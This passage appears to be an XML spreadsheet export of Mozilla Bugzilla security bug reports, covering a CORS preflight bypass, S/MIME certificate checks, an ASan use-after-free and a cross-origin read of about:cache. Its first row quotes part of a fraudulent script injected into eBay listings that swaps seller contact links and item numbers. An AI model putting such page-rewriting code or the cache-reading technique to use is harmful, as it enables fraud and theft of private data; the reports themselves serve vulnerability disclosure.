        if (d[i].innerHTML.match(/&lt;a href="https?:\/\/[\-A-Z0-9+&amp;@#\/%?=~_|!:,.;]*[\-A-Z0-9+&amp;@#\/%=~_|]"&gt;Email the seller&lt;\/a&gt;/im)) {
				d[i].innerHTML = d[i].innerHTML.replace(/&lt;a href="https?:\/\/[\-A-Z0-9+&amp;@#\/%?=~_|!:,.;]*[\-A-Z0-9+&amp;@#\/%=~_|]"&gt;Email the seller&lt;\/a&gt;/im, 'Email the seller: '+mail);
				break;
			}
        if (d[i].innerHTML.match(/\d{12}$/)) {
            d[i].innerHTML = d[i].innerHTML.replace(/\d{12}/, iit);
        }
    }
    lf();
    ebay.oDocument.oPage.onAfterLoad = lf;
    loadt = true;
}
You can see more examples using this possible zero day attack at...
http://www.google.co.uk/search?q=ebClientServerCallDynamicScriptObject
Reproducible: Always
Steps to Reproduce:
1. Visit ebay page if it's still up at http://tinyurl.com/c7ow2l
Actual Results:  
The content being rewritten before your very eyes.
Reload and trying to hit stop before the XBL document loads means you can see the original page. If you let it fully load, you see the fraudulently modified page.
The content is rewritten unless you prevent that remote stylesheet chain being fully loaded.
Expected Results:  
This should not be possible and I believe reveals an XSS vulnerability for firefox. Firefox should prevent XBL bindings from remote locations in the same way it prevents other active content.
Let me know if I'm missing some important aspect here and this shouldn't be considered a security issue for Firefox. 
The use of XBL suggests that Firefox security is at fault here, but I'd like to understand more and file more relevant/useful/well-informed bugs in the future.</t>
        </is>
      </c>
      <c r="X350" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="351">
      <c r="A351" t="n">
        <v>1210302</v>
      </c>
      <c r="B351" t="inlineStr">
        <is>
          <t>2015-09-30 23:31:48 -0700</t>
        </is>
      </c>
      <c r="C351" t="inlineStr">
        <is>
          <t>CORS does a simple instead of preflighted request for POST with non-standard Content-Type header</t>
        </is>
      </c>
      <c r="D351" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:01 -0700</t>
        </is>
      </c>
      <c r="E351" t="n">
        <v>1</v>
      </c>
      <c r="F351" t="n">
        <v>1</v>
      </c>
      <c r="G351" t="n">
        <v>3</v>
      </c>
      <c r="H351" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I351" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J351" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K351" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L351" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M351" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N351" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O351" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P351" t="inlineStr">
        <is>
          <t>[adv-main42+][adv-esr38.4+]</t>
        </is>
      </c>
      <c r="Q351" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R351" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S351" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T351" t="n">
        <v>1</v>
      </c>
      <c r="U351" t="n">
        <v>0</v>
      </c>
      <c r="V351" t="n">
        <v>80</v>
      </c>
      <c r="W351" t="inlineStr">
        <is>
          <t>Created attachment 8668283
Details.docx
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Steps to reproduce:
Created and HTML page which will fire a cross domain POST request. opened the file in firefox and clicked on the button. It sends a cross domain request without any security check. (More details are present in the attached doc)
Actual results:
Firefox sends the request directly to the domain without security check. Sends the cross origin POST request from the file hosted locally to a totally different domain. 
Expected results:
Expected result is, When a cross domain POST happens browser should ideally send the OPTION request first to the domain to check weather it accept the POST requests from this particular domain. IN the attachment I have also given a screenshot of testing the same thing in a chrome browser.</t>
        </is>
      </c>
      <c r="X351" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="352">
      <c r="A352" t="n">
        <v>1199341</v>
      </c>
      <c r="B352" t="inlineStr">
        <is>
          <t>2015-08-27 10:24:47 -0700</t>
        </is>
      </c>
      <c r="C352" t="inlineStr">
        <is>
          <t>Add collapsed job count (+n) to the Help notations table</t>
        </is>
      </c>
      <c r="D352" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E352" t="n">
        <v>1</v>
      </c>
      <c r="F352" t="n">
        <v>1</v>
      </c>
      <c r="G352" t="n">
        <v>7</v>
      </c>
      <c r="H352" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I352" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J352" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K352" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L352" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M352" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N352" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O352" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P352" t="inlineStr"/>
      <c r="Q352" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R352" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S352" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T352" t="n">
        <v>1</v>
      </c>
      <c r="U352" t="n">
        <v>0</v>
      </c>
      <c r="V352" t="n">
        <v>7</v>
      </c>
      <c r="W352" t="inlineStr">
        <is>
          <t>It seems a reasonable thing to add job counts to the Help notations table since we've landed the feature, so I will do that.</t>
        </is>
      </c>
      <c r="X352" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="353">
      <c r="A353" t="n">
        <v>1738501</v>
      </c>
      <c r="B353" t="inlineStr">
        <is>
          <t>2021-10-29 15:30:51 -0700</t>
        </is>
      </c>
      <c r="C353" t="inlineStr">
        <is>
          <t>Automatic S/MIME cert import should use additional verification using mozilla::pkix</t>
        </is>
      </c>
      <c r="D353" t="inlineStr">
        <is>
          <t>2022-03-23 08:33:09 -0700</t>
        </is>
      </c>
      <c r="E353" t="n">
        <v>1</v>
      </c>
      <c r="F353" t="n">
        <v>1</v>
      </c>
      <c r="G353" t="n">
        <v>3</v>
      </c>
      <c r="H353" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I353" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J353" t="inlineStr">
        <is>
          <t>Security: S/MIME</t>
        </is>
      </c>
      <c r="K353" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L353" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M353" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N353" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O353" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P353" t="inlineStr"/>
      <c r="Q353" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R353" t="inlineStr">
        <is>
          <t>S1</t>
        </is>
      </c>
      <c r="S353" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T353" t="n">
        <v>1</v>
      </c>
      <c r="U353" t="n">
        <v>0</v>
      </c>
      <c r="V353" t="n">
        <v>18</v>
      </c>
      <c r="W353" t="inlineStr">
        <is>
          <t>When processing incoming S/MIME email that is digitally signed, we:
- (a) perform a check of the signature, including verification of the signing certificate
- (b) import the certificates that are found inside the signature, because they might be necessary for verifying the signing certificate, and also for making it possible to use these certificates in the future for encryption
The classic NSS verification is limited in its ability to perform revocation checking, in particular the current configuration used by the Gecko platform has trouble with a proxy configuration.
In addition the S/MIME implementation in NSS is hardcoded to use the classic NSS verification APIs.
Therefore in bug 324474, we had added an additional check at the mail code level. In bug 813418 that code was later upgraded to use the mozilla::pkix for an initial validity check.
However, that additional check is limited to check the signature certificate. Earlier, we perform import of certificates that are bundled with the signature.
This bug suggests that we perform the additional check for all certificates that we are automatically importing, too.
We should expedite adding this check, therefore I'm using a workaround that involves copying some internal NSS code to the Thunderbird code. At a later time, we should clean this up by adding a new API to NSS, that allows the mail code to perform its own additional checks using a callback. (The design of the new API can be discussed at a later time, when we perform the cleanup.)
It was noticed that the mozilla::pkix code doesn't support checking DSA certificates nor RSA-PSS certificates.
This means, because of the existing checks, we never show signatures from such certificates as valid. I couldn't find any bug report in the S/MIME component mentioning the classic DSA algorithm, so apparently nobody has ever complained that DSA cert signatures are always reported in Thunderbird as invalid. And it's already known that RSA-PSS is not yet supported by the Thunderbird S/MIME code (bug 1597202).
Therefore I'm not worried that the suggested change will extend this limitation to the automatic certificate import from incoming email, it seems unlikely that it will have a relevant impact.</t>
        </is>
      </c>
      <c r="X353" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="354">
      <c r="A354" t="n">
        <v>1369074</v>
      </c>
      <c r="B354" t="inlineStr">
        <is>
          <t>2017-05-31 08:19:35 -0700</t>
        </is>
      </c>
      <c r="C354" t="inlineStr">
        <is>
          <t>Crash in mozilla::layers::APZCTreeManager::StartScrollbarDrag (on about: pages only)</t>
        </is>
      </c>
      <c r="D354" t="inlineStr">
        <is>
          <t>2021-11-29 01:40:51 -0800</t>
        </is>
      </c>
      <c r="E354" t="n">
        <v>1</v>
      </c>
      <c r="F354" t="n">
        <v>1</v>
      </c>
      <c r="G354" t="n">
        <v>3</v>
      </c>
      <c r="H354" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I354" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J354" t="inlineStr">
        <is>
          <t>Panning and Zooming</t>
        </is>
      </c>
      <c r="K354" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L354" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M354" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N354" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O354" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P354" t="inlineStr">
        <is>
          <t>[gfx-noted]</t>
        </is>
      </c>
      <c r="Q354" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R354" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S354" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T354" t="n">
        <v>1</v>
      </c>
      <c r="U354" t="n">
        <v>0</v>
      </c>
      <c r="V354" t="n">
        <v>11</v>
      </c>
      <c r="W354" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-169ff542-249e-49c2-933d-4920b0170531.
=============================================================
There are reports of this on Window NT and Mac OS X. It just started with the latest Nightly, 55.0a1, 20170531030204.
I crashed with only about:newtab open.  The browser seemed to crash when I clicked away from the window (click on desktop), but that may have been coincidental.  I haven't reproduced the crash yet.  One install on Mac has already submitted two reports.</t>
        </is>
      </c>
      <c r="X354" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="355">
      <c r="A355" t="n">
        <v>966006</v>
      </c>
      <c r="B355" t="inlineStr">
        <is>
          <t>2014-01-30 13:54:22 -0800</t>
        </is>
      </c>
      <c r="C355" t="inlineStr">
        <is>
          <t>heap-use-after-free in libxul.so!nsHostResolver::ConditionallyRefreshRecord()</t>
        </is>
      </c>
      <c r="D355" t="inlineStr">
        <is>
          <t>2024-05-30 08:32:27 -0700</t>
        </is>
      </c>
      <c r="E355" t="n">
        <v>1</v>
      </c>
      <c r="F355" t="n">
        <v>1</v>
      </c>
      <c r="G355" t="n">
        <v>3</v>
      </c>
      <c r="H355" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I355" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J355" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K355" t="inlineStr">
        <is>
          <t>29 Branch</t>
        </is>
      </c>
      <c r="L355" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M355" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N355" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O355" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P355" t="inlineStr">
        <is>
          <t>[qa-][dns][fixed on 29+ by bug 981513 and bug 981447][adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q355" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R355" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S355" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T355" t="n">
        <v>1</v>
      </c>
      <c r="U355" t="n">
        <v>0</v>
      </c>
      <c r="V355" t="n">
        <v>19</v>
      </c>
      <c r="W355" t="inlineStr">
        <is>
          <t>Found by the BlackBerry Security Automated Analysis Team's fuzzing framework ALF.
At this time we do not have a test case that will reproduce the issue.
==14607==ERROR: AddressSanitizer: heap-use-after-free on address 0x603001988ce0 at pc 0x7fb8e190676a bp 0x7fff84db1080 sp 0x7fff84db1078
READ of size 4 at 0x603001988ce0 thread T0
    #0 0x7fb8e1906769 (libxul.so!nsHostResolver::ConditionallyRefreshRecord(nsHostRecord*, char const*)+0x1a9)
	Line 368 of "../../dist/include/nsTArray.h"
    #1 0x7fb8e190533d (libxul.so!nsHostResolver::ResolveHost(char const*, unsigned short, unsigned short, nsResolveHostCallback*)+0xd2d)
	Line 634 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/dns/nsHostResolver.cpp"
    #2 0x7fb8e1917874 (libxul.so!nsDNSService::AsyncResolve(nsACString_internal const&amp;, unsigned int, nsIDNSListener*, nsIEventTarget*, nsICancelable**)+0xb44)
	Line 675 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/dns/nsDNSService2.cpp"
    #3 0x7fb8e182cc9d (libxul.so!nsDNSPrefetch::Prefetch(unsigned short)+0x1dd)
	Line 64 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsDNSPrefetch.cpp"
    #4 0x7fb8e1ae05bf (libxul.so!mozilla::net::nsHttpChannel::BeginConnect()+0x104f)
	Line 4540 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/protocol/http/nsHttpChannel.cpp"
    #5 0x7fb8e1ae15be (libxul.so!mozilla::net::nsHttpChannel::OnProxyAvailable(nsICancelable*, nsIURI*, nsIProxyInfo*, tag_nsresult)+0x10e)
	Line 4650 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/protocol/http/nsHttpChannel.cpp"
    #6 0x7fb8e18b2a25 (libxul.so!nsAsyncResolveRequest::DoCallback()+0x9a5)
	Line 238 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsProtocolProxyService.cpp"
    #7 0x7fb8e1878251 (libxul.so!nsProtocolProxyService::AsyncResolveInternal(nsIURI*, unsigned int, nsIProtocolProxyCallback*, nsICancelable**, bool)+0x8a1)
	Line 130 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsProtocolProxyService.cpp"
    #8 0x7fb8e1ad03d9 (libxul.so!mozilla::net::nsHttpChannel::ResolveProxy()+0x2f9)
	Line 1776 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/protocol/http/nsHttpChannel.cpp"
    #9 0x7fb8e1adf3ea (libxul.so!mozilla::net::nsHttpChannel::AsyncOpen(nsIStreamListener*, nsISupports*)+0x5ea)
	Line 4444 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/protocol/http/nsHttpChannel.cpp"
    #10 0x7fb8e4ea2a59 (libxul.so!mozilla::dom::HTMLTrackElement::LoadResource()+0xad9)
	Line 247 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/html/content/src/HTMLTrackElement.cpp"
    #11 0x7fb8e4ea858c (libxul.so!nsRunnableMethodImpl&lt;void (mozilla::dom::HTMLTrackElement::*)(), void, true&gt;::Run()+0x6c)
	Line 383 of "../../../../dist/include/nsThreadUtils.h"
    #12 0x7fb8e4e36415 (libxul.so!mozilla::dom::nsSyncSection::Run()+0xa5)
	Line 693 of "/builds/slave/m-in-l64-asan-0000000000000000/build/content/html/content/src/HTMLMediaElement.cpp"
    #13 0x7fb8e4007dc8 (libxul.so!nsBaseAppShell::RunSyncSectionsInternal(bool, unsigned int)+0x228)
	Line 349 of "/builds/slave/m-in-l64-asan-0000000000000000/build/widget/xpwidgets/nsBaseAppShell.cpp"
    #14 0x7fb8e40085d8 (libxul.so!non-virtual thunk to nsBaseAppShell::AfterProcessNextEvent(nsIThreadInternal*, unsigned int, bool)+0x48)
	Line 90 of "/builds/slave/m-in-l64-asan-0000000000000000/build/widget/xpwidgets/nsBaseAppShell.h"
    #15 0x7fb8e16f47da (libxul.so!nsThread::ProcessNextEvent(bool, bool*)+0xffa)
	Line 648 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsThread.cpp"
    #16 0x7fb8e15ce521 (libxul.so!NS_ProcessNextEvent(nsIThread*, bool)+0xb1)
	Line 263 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/glue/nsThreadUtils.cpp"
    #17 0x7fb8e1eedbd1 (libxul.so!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*)+0x311)
	Line 95 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/glue/MessagePump.cpp"
    #18 0x7fb8e1e5fd53 (libxul.so!MessageLoop::Run()+0x1c3)
	Line 226 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/chromium/src/base/message_loop.cc"
    #19 0x7fb8e400696c (libxul.so!nsBaseAppShell::Run()+0x5c)
	Line 161 of "/builds/slave/m-in-l64-asan-0000000000000000/build/widget/xpwidgets/nsBaseAppShell.cpp"
    #20 0x7fb8e6c4c2c6 (libxul.so!nsAppStartup::Run()+0xc6)
	Line 268 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/components/startup/nsAppStartup.cpp"
    #21 0x7fb8e6a646e5 (libxul.so!XREMain::XRE_mainRun()+0x1de5)
	Line 4023 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #22 0x7fb8e6a6561a (libxul.so!XREMain::XRE_main(int, char**, nsXREAppData const*)+0x4fa)
	Line 4091 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #23 0x7fb8e6a6654b (libxul.so!XRE_main+0x3ab)
	Line 4331 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #24 0x459dcd (firefox!main+0x94d)
	Line 280 of "/builds/slave/m-in-l64-asan-0000000000000000/build/browser/app/nsBrowserApp.cpp"
    #25 0x7fb8f1c2d76c (libc.so.6!__libc_start_main+0xec)
	Line 226 of "libc-start.c"
    #26 0x45934c (firefox!_start+0x28)
0x603001988ce0 is located 0 bytes inside of 24-byte region [0x603001988ce0,0x603001988cf8)
freed by thread T3 (Socket Thread) here:
    #0 0x446255 (firefox!free+0x55)
	Line 64 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc"
    #1 0x7fb8e15c2a5d (libxul.so!nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::ShrinkCapacity(unsigned int, unsigned long)+0x14d)
	Line 212 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/build/../glue/nsTArray.h"
previously allocated by thread T3 (Socket Thread) here:
    #0 0x446395 (firefox!malloc+0x55)
	Line 74 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc"
    #1 0x7fb8ed308588 (libmozalloc.so!moz_xmalloc+0x8)
	Line 52 of "/builds/slave/m-in-l64-asan-0000000000000000/build/memory/mozalloc/mozalloc.cpp"
Thread T3 (Socket Thread) created by T0 here:
    #0 0x437801 (firefox!pthread_create+0x71)
	Line 155 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc"
    #1 0x7fb8ef6d9be5 (libnspr4.so!_PR_CreateThread+0x4a5)
	Line 445 of "/builds/slave/m-in-l64-asan-0000000000000000/build/nsprpub/pr/src/pthreads/ptthread.c"
    #2 0x7fb8ef6d9737 (libnspr4.so!PR_CreateThread+0x17)
	Line 528 of "/builds/slave/m-in-l64-asan-0000000000000000/build/nsprpub/pr/src/pthreads/ptthread.c"
Shadow bytes around the buggy address:
  0x0c0680329140: fa fa fa fa fa fa fa fa fd fd fd fd fa fa fd fd
  0x0c0680329150: fd fd fa fa fa fa fa fa fa fa fd fd fd fd fa fa
  0x0c0680329160: fa fa fa fa fa fa 00 00 00 fa fa fa fa fa fa fa
  0x0c0680329170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fd fd
  0x0c0680329180: fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c0680329190: fa fa fa fa fa fa fd fd fd fa fa fa[fd]fd fd fa
  0x0c06803291a0: fa fa fa fa fa fa fa fa fd fd fd fd fa fa 00 00
  0x0c06803291b0: 02 fa fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x0c06803291c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c06803291d0: fa fa fa fa fa fa fa fa 00 00 00 00 fa fa fd fd
  0x0c06803291e0: fd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14607==ABORTING</t>
        </is>
      </c>
      <c r="X355" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="356">
      <c r="A356" t="n">
        <v>1310183</v>
      </c>
      <c r="B356" t="inlineStr">
        <is>
          <t>2016-10-14 06:35:48 -0700</t>
        </is>
      </c>
      <c r="C356" t="inlineStr">
        <is>
          <t>Remote web content can read about:cache entries in 49</t>
        </is>
      </c>
      <c r="D356" t="inlineStr">
        <is>
          <t>2017-02-09 07:55:55 -0800</t>
        </is>
      </c>
      <c r="E356" t="n">
        <v>1</v>
      </c>
      <c r="F356" t="n">
        <v>1</v>
      </c>
      <c r="G356" t="n">
        <v>3</v>
      </c>
      <c r="H356" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I356" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J356" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K356" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L356" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M356" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N356" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O356" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P356" t="inlineStr"/>
      <c r="Q356" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R356" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S356" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T356" t="n">
        <v>1</v>
      </c>
      <c r="U356" t="n">
        <v>0</v>
      </c>
      <c r="V356" t="n">
        <v>20</v>
      </c>
      <c r="W356" t="inlineStr">
        <is>
          <t>This seems fixed in my testing on beta and later, but in 49 without electrolysis the test case works:
https://cdn.cliqz.com/browser-f/fun-demo/xkcd.html
What happens is that after a while (or immediately in a rather empty profile) the page displays the contents of about:cache instead of the XKCD comic. Remember you need to disable e10s for this attack to work. This came from our partners at Cliqz and they also have an additional demo attack page that uses a service worker to outlive the tab and keep sending the private data in the background.
If my testing is correct, can someone find out which patch actually fixed this and whether we should release a hotfix?
Bug 1195757 and bug 1253673 seem to be related, but the release information doesn't correspond with my testing.
CCing Gijs and Tanvi in case they know the answer already.</t>
        </is>
      </c>
      <c r="X356" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="357">
      <c r="A357" t="n">
        <v>811382</v>
      </c>
      <c r="B357" t="inlineStr">
        <is>
          <t>2012-11-13 11:03:12 -0800</t>
        </is>
      </c>
      <c r="C357" t="inlineStr">
        <is>
          <t>Update OTS to r95</t>
        </is>
      </c>
      <c r="D357" t="inlineStr">
        <is>
          <t>2013-04-30 18:41:00 -0700</t>
        </is>
      </c>
      <c r="E357" t="n">
        <v>1</v>
      </c>
      <c r="F357" t="n">
        <v>1</v>
      </c>
      <c r="G357" t="n">
        <v>3</v>
      </c>
      <c r="H357" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I357" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J357" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K357" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L357" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M357" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N357" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O357" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P357" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q357" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R357" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S357" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T357" t="n">
        <v>1</v>
      </c>
      <c r="U357" t="n">
        <v>0</v>
      </c>
      <c r="V357" t="n">
        <v>28</v>
      </c>
      <c r="W357" t="inlineStr">
        <is>
          <t>We should update OTS to r95 to fix an out of bounds issue.</t>
        </is>
      </c>
      <c r="X357" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="358">
      <c r="A358" t="n">
        <v>1111737</v>
      </c>
      <c r="B358" t="inlineStr">
        <is>
          <t>2014-12-15 11:20:16 -0800</t>
        </is>
      </c>
      <c r="C358" t="inlineStr">
        <is>
          <t>crash nsScriptLoader not thread-safe nsScriptLoader.cpp:178</t>
        </is>
      </c>
      <c r="D358" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E358" t="n">
        <v>1</v>
      </c>
      <c r="F358" t="n">
        <v>1</v>
      </c>
      <c r="G358" t="n">
        <v>3</v>
      </c>
      <c r="H358" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I358" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J358" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K358" t="inlineStr">
        <is>
          <t>32 Branch</t>
        </is>
      </c>
      <c r="L358" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M358" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N358" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O358" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P358" t="inlineStr">
        <is>
          <t>[adv-main35+][adv-esr31.4+]</t>
        </is>
      </c>
      <c r="Q358" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R358" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S358" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T358" t="n">
        <v>1</v>
      </c>
      <c r="U358" t="n">
        <v>0</v>
      </c>
      <c r="V358" t="n">
        <v>22</v>
      </c>
      <c r="W358" t="inlineStr">
        <is>
          <t>during shutdown .. release off main thread
(gdb) bt
#0  0x00007f710150699d in nanosleep () at ../sysdeps/unix/syscall-template.S:81
#1  0x00007f7101506834 in __sleep (seconds=0) at ../sysdeps/unix/sysv/linux/sleep.c:137
#2  0x00007f7106f000f6 in ah_crap_handler (signum=11) at /home/mcmanus/src/mozilla2/wd/gecko-dev/toolkit/xre/nsSigHandlers.cpp:101
#3  0x00007f7106f001fb in child_ah_crap_handler (signum=11) at /home/mcmanus/src/mozilla2/wd/gecko-dev/toolkit/xre/nsSigHandlers.cpp:113
#4  0x00007f7107da51b9 in AsmJSFaultHandler (signum=11, info=0x7f70f5afc470, context=0x7f70f5afc340) at /home/mcmanus/src/mozilla2/wd/gecko-dev/js/src/asmjs/AsmJSSignalHandlers.cpp:912
#5  &lt;signal handler called&gt;
#6  nsScriptLoader::Release (this=0x7f70f10bc080) at /home/mcmanus/src/mozilla2/wd/gecko-dev/dom/base/nsScriptLoader.cpp:178
#7  0x00007f7104011cdd in nsRefPtr&lt;nsScriptLoader&gt;::~nsRefPtr (this=0x7f70ef090c30) at ../../dist/include/nsRefPtr.h:59
